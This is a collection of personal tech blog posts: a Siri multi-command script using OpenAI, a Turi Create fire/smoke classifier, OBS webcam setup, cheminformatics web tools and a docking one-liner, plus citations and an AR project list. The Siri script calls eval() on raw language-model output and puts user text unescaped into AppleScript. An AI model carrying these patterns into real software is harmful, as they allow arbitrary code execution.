The package is available on my repository and only depends on boost. ( Both, Vina and Vina-Split are part of the package)
]]>My main objective was to see if I could issue multi-intent commands in one go. Obviously, Siri cannot do that (neither can Alexa, Cortana, or Google Assistant). The script here can issue either a single command, or use the help of OpenAI's DaVinci model to extract multiple commands and pass them on to Siri.
If you are here just for the code:
import argparse
import applescript
import openai
from os import getenv
openai.api_key = getenv("OPENAI_KEY")
engine = "text-davinci-003"
def execute_with_llm(command_text: str) -> None:
llm_prompt = f"""You are provided with multiple commands as a single command. Break down all the commands and return them in a list of strings. If you are provided with a single command, return a list with a single string, trying your best to understand the command.
Example:
Q: "Turn on the lights and turn off the lights"
A: ["Turn on the lights", "Turn off the lights"]
Q: "Switch off the lights and then play some music"
A: ["Switch off the lights", "Play some music"]
Q: "I am feeling sad today, play some music"
A: ["Play some cheerful music"]
Q: "{command_text}"
A:
"""
completion = openai.Completion.create(engine=engine, prompt=llm_prompt, max_tokens=len(command_text.split(" "))*2)
for task in eval(completion.choices[0].text):
execute_command(task)
def execute_command(command_text: str) -> None:
"""Execute a Siri command."""
script = applescript.AppleScript(f"""
tell application "System Events" to tell the front menu bar of process "SystemUIServer"
tell (first menu bar item whose description is "Siri")
perform action "AXPress"
end tell
end tell
delay 2
tell application "System Events"
set textToType to "{command_text}"
keystroke textToType
key code 36
end tell
""")
script.run()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("command", nargs="?", type=str, help="The command to pass to Siri", default="What time is it?")
parser.add_argument('--openai', action=argparse.BooleanOptionalAction, help="Use OpenAI to detect multiple intents", default=False)
args = parser.parse_args()
if args.openai:
execute_with_llm(args.command)
else:
execute_command(args.command)
Usage:
python3 main.py "play some taylor swift"
python3 main.py "turn off the lights and play some music" --openai
I am not actually going to explain it as if I am explaining to a five-year old kid.
In the age of Siri Shortcuts, AppleScript can still do more. It is a scripting language created by Apple that can help you automate pretty much anything you see on your screen.
We use the following AppleScript to trigger Siri and then type in our command:
tell application "System Events" to tell the front menu bar of process "SystemUIServer"
tell (first menu bar item whose description is "Siri")
perform action "AXPress"
end tell
end tell
delay 2
tell application "System Events"
set textToType to "Play some rock music"
keystroke textToType
key code 36
end tell
This first triggers Siri, waits for a couple of seconds, and then types in our command. In the script, this functionality is handled by the execute_command function.
import applescript
def execute_command(command_text: str) -> None:
"""Execute a Siri command."""
script = applescript.AppleScript(f"""
tell application "System Events" to tell the front menu bar of process "SystemUIServer"
tell (first menu bar item whose description is "Siri")
perform action "AXPress"
end tell
end tell
delay 2
tell application "System Events"
set textToType to "{command_text}"
keystroke textToType
key code 36
end tell
""")
script.run()
We can call OpenAI's API to autocomplete our prompt and extract multiple commands. We don't need to use OpenAI's API, and can also simply use Google's Flan-T5 model using HuggingFace's transformers library.
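As a rough sketch of that local alternative (the model choice and prompt here are my assumptions, untested):
from transformers import pipeline

generator = pipeline("text2text-generation", model="google/flan-t5-base")
out = generator("Break this into a list of separate commands: turn off the lights and play some music")
print(out[0]["generated_text"])
The few-shot prompt I use with the OpenAI API is shown below: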
You are provided with multiple commands as a single command. Break down all the commands and return them in a list of strings. If you are provided with a single command, return a list with a single string, trying your best to understand the command.
Example:
Q: "Turn on the lights and turn off the lights"
A: ["Turn on the lights", "Turn off the lights"]
Q: "Switch off the lights and then play some music"
A: ["Switch off the lights", "Play some music"]
Q: "I am feeling sad today, play some music"
A: ["Play some cheerful music"]
Q: "{command_text}"
A:
This prompt gives the model a few examples to increase the generation accuracy, along with instructing it to return a Python list.
import openai
from os import getenv
openai.api_key = getenv("OPENAI_KEY")
engine = "text-davinci-003"
def execute_with_llm(command_text: str) -> None:
llm_prompt = f"""You are provided with multiple commands as a single command. Break down all the commands and return them in a list of strings. If you are provided with a single command, return a list with a single string, trying your best to understand the command.
Example:
Q: "Turn on the lights and turn off the lights"
A: ["Turn on the lights", "Turn off the lights"]
Q: "Switch off the lights and then play some music"
A: ["Switch off the lights", "Play some music"]
Q: "I am feeling sad today, play some music"
A: ["Play some cheerful music"]
Q: "{command_text}"
A:
"""
completion = openai.Completion.create(engine=engine, prompt=llm_prompt, max_tokens=len(command_text.split(" "))*2)
for task in eval(completion.choices[0].text): # NEVER eval() untrusted LLM output like this in production
execute_command(task)
To finish it all off, we can use argparse to only send the input command to OpenAI when asked to do so.
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("command", nargs="?", type=str, help="The command to pass to Siri", default="What time is it?")
parser.add_argument('--openai', action=argparse.BooleanOptionalAction, help="Use OpenAI to detect multiple intents", default=False)
args = parser.parse_args()
if args.openai:
execute_with_llm(args.command)
else:
execute_command(args.command)
Siri is still dumb. When I ask it to Switch off the lights, it defaults to the home thousands of miles away. But this code snippet definitely does work!
For setting up Kaggle with Google Colab, please refer to my previous post
import os
from google.colab import drive
drive.mount('/content/drive')
os.environ['KAGGLE_CONFIG_DIR'] = "/content/drive/My Drive/"
!kaggle datasets download ashutosh69/fire-and-smoke-dataset
!unzip "fire-and-smoke-dataset.zip"
!mkdir default smoke fire
!ls data/data/img_data/train/default/*.jpg
\
img_1002.jpg img_20.jpg img_519.jpg img_604.jpg img_80.jpg
img_1003.jpg img_21.jpg img_51.jpg img_60.jpg img_8.jpg
img_1007.jpg img_22.jpg img_520.jpg img_61.jpg img_900.jpg
img_100.jpg img_23.jpg img_521.jpg 'img_62 (2).jpg' img_920.jpg
img_1014.jpg img_24.jpg 'img_52 (2).jpg' img_62.jpg img_921.jpg
img_1018.jpg img_29.jpg img_522.jpg 'img_63 (2).jpg' img_922.jpg
img_101.jpg img_3000.jpg img_523.jpg img_63.jpg img_923.jpg
img_1027.jpg img_335.jpg img_524.jpg img_66.jpg img_924.jpg
img_102.jpg img_336.jpg img_52.jpg img_67.jpg img_925.jpg
img_1042.jpg img_337.jpg img_530.jpg img_68.jpg img_926.jpg
img_1043.jpg img_338.jpg img_531.jpg img_700.jpg img_927.jpg
img_1046.jpg img_339.jpg 'img_53 (2).jpg' img_701.jpg img_928.jpg
img_1052.jpg img_340.jpg img_532.jpg img_702.jpg img_929.jpg
img_107.jpg img_341.jpg img_533.jpg img_703.jpg img_930.jpg
img_108.jpg img_3.jpg img_537.jpg img_704.jpg img_931.jpg
img_109.jpg img_400.jpg img_538.jpg img_705.jpg img_932.jpg
img_10.jpg img_471.jpg img_539.jpg img_706.jpg img_933.jpg
img_118.jpg img_472.jpg img_53.jpg img_707.jpg img_934.jpg
img_12.jpg img_473.jpg img_540.jpg img_708.jpg img_935.jpg
img_14.jpg img_488.jpg img_541.jpg img_709.jpg img_938.jpg
img_15.jpg img_489.jpg 'img_54 (2).jpg' img_70.jpg img_958.jpg
img_16.jpg img_490.jpg img_542.jpg img_710.jpg img_971.jpg
img_17.jpg img_491.jpg img_543.jpg 'img_71 (2).jpg' img_972.jpg
img_18.jpg img_492.jpg img_54.jpg img_71.jpg img_973.jpg
img_19.jpg img_493.jpg 'img_55 (2).jpg' img_72.jpg img_974.jpg
img_1.jpg img_494.jpg img_55.jpg img_73.jpg img_975.jpg
img_200.jpg img_495.jpg img_56.jpg img_74.jpg img_980.jpg
img_201.jpg img_496.jpg img_57.jpg img_75.jpg img_988.jpg
img_202.jpg img_497.jpg img_58.jpg img_76.jpg img_9.jpg
img_203.jpg img_4.jpg img_59.jpg img_77.jpg
img_204.jpg img_501.jpg img_601.jpg img_78.jpg
img_205.jpg img_502.jpg img_602.jpg img_79.jpg
img_206.jpg img_50.jpg img_603.jpg img_7.jpg
The image files are not actually JPEGs, so we first need to save them in the correct format for Turi Create
from PIL import Image
import glob
folders = ["default","smoke","fire"]
for folder in folders:
n = 1
for file in glob.glob("./data/data/img_data/train/" + folder + "/*.jpg"):
im = Image.open(file)
rgb_im = im.convert('RGB')
rgb_im.save((folder + "/" + str(n) + ".jpg"), quality=100)
n +=1
!mkdir train
!mv default ./train
!mv smoke ./train
!mv fire ./train
!pip install turicreate
\
import turicreate as tc
import os
data = tc.image_analysis.load_images("./train", with_path=True)
data["label"] = data["path"].apply(lambda path: os.path.basename(os.path.dirname(path)))
print(data)
data.save('fire-smoke.sframe')
+-------------------------+------------------------+
| path | image |
+-------------------------+------------------------+
| ./train/default/1.jpg | Height: 224 Width: 224 |
| ./train/default/10.jpg | Height: 224 Width: 224 |
| ./train/default/100.jpg | Height: 224 Width: 224 |
| ./train/default/101.jpg | Height: 224 Width: 224 |
| ./train/default/102.jpg | Height: 224 Width: 224 |
| ./train/default/103.jpg | Height: 224 Width: 224 |
| ./train/default/104.jpg | Height: 224 Width: 224 |
| ./train/default/105.jpg | Height: 224 Width: 224 |
| ./train/default/106.jpg | Height: 224 Width: 224 |
| ./train/default/107.jpg | Height: 224 Width: 224 |
+-------------------------+------------------------+
[2028 rows x 2 columns]
Note: Only the head of the SFrame is printed.
You can use print_rows(num_rows=m, num_columns=n) to print more rows and columns.
+-------------------------+------------------------+---------+
| path | image | label |
+-------------------------+------------------------+---------+
| ./train/default/1.jpg | Height: 224 Width: 224 | default |
| ./train/default/10.jpg | Height: 224 Width: 224 | default |
| ./train/default/100.jpg | Height: 224 Width: 224 | default |
| ./train/default/101.jpg | Height: 224 Width: 224 | default |
| ./train/default/102.jpg | Height: 224 Width: 224 | default |
| ./train/default/103.jpg | Height: 224 Width: 224 | default |
| ./train/default/104.jpg | Height: 224 Width: 224 | default |
| ./train/default/105.jpg | Height: 224 Width: 224 | default |
| ./train/default/106.jpg | Height: 224 Width: 224 | default |
| ./train/default/107.jpg | Height: 224 Width: 224 | default |
+-------------------------+------------------------+---------+
[2028 rows x 3 columns]
Note: Only the head of the SFrame is printed.
You can use print_rows(num_rows=m, num_columns=n) to print more rows and columns.
import turicreate as tc
# Load the data
data = tc.SFrame('fire-smoke.sframe')
# Make a train-test split
train_data, test_data = data.random_split(0.8)
# Create the model
model = tc.image_classifier.create(train_data, target='label')
# Save predictions to an SArray
predictions = model.predict(test_data)
# Evaluate the model and print the results
metrics = model.evaluate(test_data)
print(metrics['accuracy'])
# Save the model for later use in Turi Create
model.save('fire-smoke.model')
# Export for use in Core ML
model.export_coreml('fire-smoke.mlmodel')
Performing feature extraction on resized images...
Completed 64/1633
Completed 128/1633
Completed 192/1633
Completed 256/1633
Completed 320/1633
Completed 384/1633
Completed 448/1633
Completed 512/1633
Completed 576/1633
Completed 640/1633
Completed 704/1633
Completed 768/1633
Completed 832/1633
Completed 896/1633
Completed 960/1633
Completed 1024/1633
Completed 1088/1633
Completed 1152/1633
Completed 1216/1633
Completed 1280/1633
Completed 1344/1633
Completed 1408/1633
Completed 1472/1633
Completed 1536/1633
Completed 1600/1633
Completed 1633/1633
PROGRESS: Creating a validation set from 5 percent of training data. This may take a while.
You can set ``validation_set=None`` to disable validation tracking.
Logistic regression:
--------------------------------------------------------
Number of examples : 1551
Number of classes : 3
Number of feature columns : 1
Number of unpacked features : 2048
Number of coefficients : 4098
Starting L-BFGS
--------------------------------------------------------
+-----------+----------+-----------+--------------+-------------------+---------------------+
| Iteration | Passes | Step size | Elapsed Time | Training Accuracy | Validation Accuracy |
+-----------+----------+-----------+--------------+-------------------+---------------------+
| 0 | 6 | 0.018611 | 0.891830 | 0.553836 | 0.560976 |
| 1 | 10 | 0.390832 | 1.622383 | 0.744681 | 0.792683 |
| 2 | 11 | 0.488541 | 1.943987 | 0.733075 | 0.804878 |
| 3 | 14 | 2.442703 | 2.512545 | 0.727917 | 0.841463 |
| 4 | 15 | 2.442703 | 2.826964 | 0.861380 | 0.853659 |
| 9 | 28 | 2.340435 | 5.492035 | 0.941328 | 0.975610 |
+-----------+----------+-----------+--------------+-------------------+---------------------+
Performing feature extraction on resized images...
Completed 64/395
Completed 128/395
Completed 192/395
Completed 256/395
Completed 320/395
Completed 384/395
Completed 395/395
0.9316455696202531
We got an accuracy of about 93% on the test set, with 94% training accuracy and 97.5% validation accuracy!
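If you want to sanity-check the exported Core ML model outside of Turi Create, something like the following sketch works with coremltools (macOS only; the input name "image" and the 224x224 size are assumptions based on Turi Create's image classifier defaults, so inspect your model's spec if it differs):

import coremltools as ct
from PIL import Image

# Load the exported model; running predictions requires macOS
model = ct.models.MLModel("fire-smoke.mlmodel")

# Turi Create image classifiers expect a 224x224 RGB image
img = Image.open("test.jpg").convert("RGB").resize((224, 224))

# "image" is the assumed input name; check model.get_spec() to confirm
print(model.predict({"image": img}))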
]]>Here are the results before you begin reading.
I am running macOS and iOS, but I will try to link to the equivalent steps for Windows as well. If you are running Arch, I assume you already know what you are doing and are using this post as inspiration rather than a how-to guide.
I assume that you have Homebrew installed.
brew cask install obs
brew cask install obs-virtualcam
Windows users can install the latest version of the plugin from the OBS Forums.
I have always liked the animated border PewDiePie uses in his videos.
The border was apparently made by a YouTuber Sleepy Tanooki. He posted a link to a Google Drive folder containing the video file. (I will be using the video overlay for the example)
It is pretty simple to use overlays in OBS:
First, create a new scene by clicking on the plus button on the bottom right corner.
Now, in the Sources section, click on the add button -> Video Capture Device -> Create New -> choose your webcam from the Device section.
You may resize it if you want.
After this, click on the add button again, but this time choose the Media Source option, then locate and choose the downloaded overlay.
I have a Sony mirrorless camera. Using Sony's Imaging Edge Desktop, you can use your laptop as a remote viewfinder and capture or record media.
After installing Imaging Edge Desktop or your camera's equivalent, open the Remote application.
Once you are able to see the camera's output in the application, switch to OBS. Create a new scene, and this time choose Window Capture in the Sources menu. After you have chosen the appropriate window, you may transform/crop the output using the properties/filters options.
Connect your iPhone via a USB cable, then open QuickTime -> File -> New Movie Recording.
In the sources, choose your device (no need to press record). You may open the camera app now.
Now, in OBS, create a new scene, and in the sources choose the Window Capture option. You will need to rotate the source.
Install the Camo app on your phone through the App Store, connect it to your Mac using a USB cable, install the companion app, and you are done.
I tried both my current iPhone and an old iPhone 5S.
The simplest solution is to use a USB webcam. I used an old Logitech C310 that was collecting dust. I was surprised to find that Logitech is still selling it after all these years and proudly advertising it! (5MP)
It did not sit well on my laptop, so I placed it on my definitely-not-Joby Gorilla Pod, which I had bought on Amazon for ~₹500.
]]>
Here, I have compiled a list of some libraries and possible ideas. I, personally, like static websites which don't require a server side application and can be hosted on platforms like GitHub Pages. Or, just by opening the HTML file and running it in your browser. WebAssembly (Wasm) has made running code written for other platforms on the web relatively easier. Combine Wasm with some pure JavaScript libraries, and you get a platform to quickly amp up your speed in some common tasks.
RDKit bundles a minimal JavaScript wrapper in their core RDKit suite. This is perfect for generating 2D figures (HTML5 Canvas/SVGs), canonical SMILES, descriptors, etc.
This can be used to flag undesirable functional groups in a given compound. Create simple key:value pairs of name:SMARTS and use them to highlight substructure matches. Thus, something like PostEra's Medicinal Chemistry Alerts can be done with RDKit-JS alone.
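To illustrate the idea, here is a rough sketch using RDKit's Python API (RDKit-JS exposes the same substructure matching; the alert names and SMARTS below are made-up examples, not a real alert set):

from rdkit import Chem

# Illustrative name:SMARTS pairs; real alert sets are much larger
alerts = {
    "nitro group": "[N+](=O)[O-]",
    "aldehyde": "[CX3H1](=O)[#6]",
}

mol = Chem.MolFromSmiles("O=[N+]([O-])c1ccccc1C=O")  # 2-nitrobenzaldehyde
for name, smarts in alerts.items():
    pattern = Chem.MolFromSmarts(smarts)
    if mol.HasSubstructMatch(pattern):
        print("Flagged:", name, "at atoms", mol.GetSubstructMatches(pattern))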
RDKit-JS is also useful for calculating basic properties of a given compound.
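For example (again sketched with the Python API; RDKit-JS has equivalent descriptor calls):

from rdkit import Chem
from rdkit.Chem import Descriptors

mol = Chem.MolFromSmiles("CC(=O)Oc1ccccc1C(=O)O")  # aspirin
print("MolWt:", Descriptors.MolWt(mol))
print("LogP:", Descriptors.MolLogP(mol))
print("TPSA:", Descriptors.TPSA(mol))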
Webina is a JavaScript/Wasm library that runs AutoDock Vina, which can enable you to run Molecular Docking straight in the browser itself.
Obviously, it takes a performance hit since the code is transpiled from C++ to Wasm. But the only major drawback (for now) is that it uses SharedArrayBuffer. Due to Spectre, this feature was disabled in all browsers. Currently, only Chromium-based and Firefox browsers have reimplemented and re-enabled it. Hopefully this will soon be supported by all major browsers again.
Frameworks have now evolved enough to allow exporting models to run on a JavaScript/Wasm backend. An example task is NER, or Named-Entity Recognition. It can be used to extract compounds or diseases from a large blob of text, which can then be matched with external references. Another example is target prediction right in the browser: CHEMBL - Target Prediction in Browser.
The ChEMBL group first trains the model using PyTorch (a Python ML library), then converts it to the ONNX runtime. A model like this could also be implemented directly in TensorFlow and then exported to run with TensorFlow.js.
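A minimal sketch of the PyTorch-to-ONNX step (the model below is a stand-in single layer over a fingerprint, not ChEMBL's actual architecture):

import torch

# Stand-in model: one linear layer mapping a 1024-bit fingerprint to 3 targets
model = torch.nn.Sequential(torch.nn.Linear(1024, 3))
model.eval()

# Export with a dummy input; the resulting .onnx file can be served to the browser
dummy = torch.randn(1, 1024)
torch.onnx.export(model, dummy, "target_predictor.onnx",
                  input_names=["fingerprint"], output_names=["scores"])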
The project aims to port cheminformatics libraries to JavaScript via Emscripten. They have ported InChI, Indigo, OpenBabel, and OpenMD.
It is written by @partridgejiang, who is also behind the Cheminfo-to-web project.
It is molecule-centric, focusing on the ability to represent, draw, edit, compare, and search molecule structures in web browsers.
The machine learning examples above can be packaged as browser extensions to perform tasks on the article you are reading. With iOS 15 bringing WebExtensions to iOS/iPadOS, the same browser extension source code can now be used on desktops and mobile phones. You could quickly create an extension to convert PDB codes into links to RCSB, highlight SMILES, highlight the output of NER models, etc.
I have not even touched all the bases of cheminformatics for the web here. There is still a lot more to unpack. Hopefully, this encourages you to explore the world of cheminformatics on the web.
obabel -:"$(pbpaste)" --gen3d -opdbqt -Otest.pdbqt && vina --receptor lu.pdbqt --center_x -9.7 --center_y 11.4 --center_z 68.9 --size_x 19.3 --size_y 29.9 --size_z 21.3 --ligand test.pdbqt
To run this command, you simply copy the SMILES structure of the ligand you want; the command takes it from your clipboard, generates the 3D structure in the AutoDock PDBQT format using Open Babel, and then docks it with your receptor using AutoDock Vina, all in one go.
Let me break down the command:
obabel -:"$(pbpaste)" --gen3d -opdbqt -Otest.pdbqt
pbpaste and pbcopy are macOS commands for pasting from and copying to the clipboard. Linux users may install the xclip and xsel packages from their respective package managers and then add these aliases to their .bash_profile, .zshrc, etc.:
alias pbcopy='xclip -selection clipboard'
alias pbpaste='xclip -selection clipboard -o'
$(pbpaste)
This is bash command substitution: the shell runs the command inside and substitutes its output. In this scenario, we use it to get the contents of the clipboard.
The rest of the command is a normal Open Babel invocation to generate a 3D structure in PDBQT format and save it as test.pdbqt.
&&
This tells the terminal to only run the next part if the previous command runs successfully without any errors.
vina --receptor lu.pdbqt --center_x -9.7 --center_y 11.4 --center_z 68.9 --size_x 19.3 --size_y 29.9 --size_z 21.3 --ligand test.pdbqt
This is just the docking command for AutoDock Vina. In the next part, I will show how to use PyMOL and a plugin to directly generate the box coordinates in Vina format (--center_x -9.7 --center_y 11.4 --center_z 68.9 --size_x 19.3 --size_y 29.9 --size_z 21.3) without needing to type them manually.
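If you want to dock a whole list of ligands instead of whatever is on your clipboard, the same pipeline is easy to script. Here is a rough Python sketch (assuming obabel and vina are on your PATH, and reusing the receptor file and box values from above):

import subprocess

smiles_list = ["CCO", "c1ccccc1O"]  # example ligands

for i, smi in enumerate(smiles_list):
    ligand = "ligand_{}.pdbqt".format(i)
    # Generate a 3D structure in PDBQT format with Open Babel
    subprocess.run(["obabel", "-:" + smi, "--gen3d", "-opdbqt", "-O" + ligand], check=True)
    # Dock it with AutoDock Vina using the same box as before
    subprocess.run([
        "vina", "--receptor", "lu.pdbqt",
        "--center_x", "-9.7", "--center_y", "11.4", "--center_z", "68.9",
        "--size_x", "19.3", "--size_y", "29.9", "--size_z", "21.3",
        "--ligand", ligand,
    ], check=True)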
Based on the project showcased at Toyota Hackathon, IITD - 17/18th December 2018
Edit: It seems like I haven't mentioned Adrian Rosebrock of PyImageSearch anywhere. I apologize for this mistake.
Recommended citation:
Chauhan, N. (2019). "Detecting Driver Fatigue, Over-Speeding, and Speeding up Post-Accident Response." International Research Journal of Engineering and Technology (IRJET), 6(5).
@article{chauhan_2019, title={Detecting Driver Fatigue, Over-Speeding, and Speeding up Post-Accident Response}, volume={6}, url={https://www.irjet.net/archives/V6/i5/IRJET-V6I5318.pdf}, number={5}, journal={International Research Journal of Engineering and Technology (IRJET)}, author={Chauhan, Navan}, year={2019}}
]]>
This is still a pre-print.
Recommended citation:
Chauhan, N. (2020, March 15). Is it possible to programmatically generate Vaporwave?. https://doi.org/10.35543/osf.io/9um2r
Chauhan, Navan. “Is It Possible to Programmatically Generate Vaporwave?.” IndiaRxiv, 15 Mar. 2020. Web.
Chauhan, Navan. 2020. “Is It Possible to Programmatically Generate Vaporwave?.” IndiaRxiv. March 15. doi:10.35543/osf.io/9um2r.
@misc{chauhan_2020,
title={Is it possible to programmatically generate Vaporwave?},
url={indiarxiv.org/9um2r},
DOI={10.35543/osf.io/9um2r},
publisher={IndiaRxiv},
author={Chauhan, Navan},
year={2020},
month={Mar}
}
]]>
This is still a pre-print.
]]>Ever wanted a nice craft soda, or a Natty Light during your ride? Mounts to the standard bottle cage holes on your bike.
Printed on an Anycubic Kobra 2 (0.20mm resolution w/ 0.40mm nozzle at 40% infill).
Download Link: Github
The OpenSCAD code can be modified to support tall boys and stovepipe cans. Email me if you need help generating more variations.
]]>Last Updated: 2022-12-17
All projects listed here are in the following format:
| Name | Company | Notes |
| --- | --- | --- |
| Hololens | Microsoft | |
| Oculus | Facebook/Meta | |
| Tesseract | Jio/Tesseract | Indian "startup" |
| R1 | Lynx | MR headset |
| Monocle | Brilliant Labs | Open source smart monocle |
| AR.js | AR-js-org | Open source framework for AR on the web. Supports image, location, and marker based tracking |
| ARKit | Apple | Framework for iOS |
| ARCore | Google | Framework for Android |
| 8thWall | Niantic | Framework for AR on the web |
| Vaunt | Intel | Sold everything to North, the company behind Focals |
| Focals | North | One of the only consumer grade smart glasses, which got bought by Google :/, don't think they will ever launch a v2 now |
It would be nice to have an AR app/website that goes through all the safety checklists on our cars, so we never have to see another loose fuel line blow up an entire car.
Possible solution: add a fiducial marker under the hood of the car and use it to highlight areas which need to be checked, or multiple markers which are activated in a particular order and show up as disabled until you complete the previous step.
Although App Clips on iOS have limited capabilities available to them, ARKit is one of them. This means a QR code / NFC trigger can be used to launch a mini ARKit-based App Clip.
Not every pair of smart glasses needs AR-based surface tracking / SLAM to display things. Even a simple display that can overlay elements on the real world is capable of showing tons of data.
]]>